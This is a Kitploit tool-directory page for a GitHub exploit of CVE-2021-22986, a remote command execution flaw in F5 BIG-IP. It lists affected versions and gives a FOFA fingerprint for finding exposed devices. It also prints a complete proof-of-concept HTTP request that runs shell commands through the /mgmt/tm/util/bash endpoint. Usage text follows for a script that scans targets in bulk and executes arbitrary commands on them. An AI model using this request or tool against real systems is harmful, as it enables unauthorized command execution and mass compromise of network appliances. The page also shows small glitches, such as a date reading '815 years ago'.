Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-202122986-EXP — F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用 | Kitploit
Tools/GitHubGitHub/yaunsky/cve-202122986-exp
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubyaunsky/cve-202122986-exp

CVE-202122986-EXP

F5 BIG-IP远程代码执行;cve-2021-22986,批量检测;命令执行利用

View Repository
815 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

F5 BIG-IP Remote Command Execution Vulnerability (CVE-2021-22986)

Affected Versions

F5 BIG-IP 16.x: 16.1.0.3

F5 BIG-IP 15.x: 15.1.0.4

F5 BIG-IP 14.x: 14.1.2.6

F5 BIG-IP 13.x: 13.1.3.4

F5 BIG-IP 12.x: 12.1.5.2

F5 BIG-IP 11.x: 11.6.5.2

fofa

icon_hash="-335242539"

POC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Upgrade-Insecure-Requests: 1
Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

Script Usage

python3 CVE202122986.py --help

root@kitploit:~
Usage: CVE202122986.py [OPTIONS]

Options:
  -u, --url TEXT   Target URL, for single target detection; Example:python3 CVE202122986.py -u https://ip:port

  -f, --file TEXT  Target File, for batch target detection; Example:python3 CVE202122986.py -f ip.txt

  -c, --cmd TEXT   Target command, command execution; Example: python3 CVE202122986.py -cmd id

  --help           Show this message and exit.
Download Tool